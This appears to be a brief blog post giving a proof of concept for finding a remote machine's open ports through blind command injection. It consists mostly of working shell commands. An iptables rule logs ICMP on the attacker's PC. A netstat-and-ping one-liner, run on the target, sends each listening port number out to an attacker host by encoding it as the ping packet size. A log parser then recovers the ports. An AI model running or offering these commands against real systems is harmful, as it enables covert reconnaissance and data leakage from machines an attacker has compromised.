Listener discovery using ping PoC

This is a awesome way to use usual programs/commands in an unusual way. This PoC can be used to discover open ports on a remote PC when we have the possibility to send to it a blind command but we have no idea about TCP control in the remote environment. These simple scripts take advantage of the length of ICMP packets sended by the ping command. Some simple pipeling provide the normalization of sended and captured strings. In the following case two Linux machines are used.

On the local PC I start a logging process:

iptables -I INPUT -p ICMP -j LOG

On the PC to test, maybe using a blind command:

netstat -lntp | grep LISTEN | awk '{print $4}' | cut -d: -f2 | grep -ve "^$" |sort -u | while read line ; do echo $line; ping -c 1 -s $line <remote_PC>; done;

Again on local PC I collect and normalize the log:

tail /var/log/messages | grep LEN |awk '{print $13}'| cut -d= -f2 |sort -n -u| while read line; do PORT=$(($line-28)) && echo Open Port = $PORT; done;

I based this Proof of Concept on the article “Blind Command Line Injection” from PenTest Magazine by Mr. Chris Duffy: thank you.

Leave a Reply

Your email address will not be published.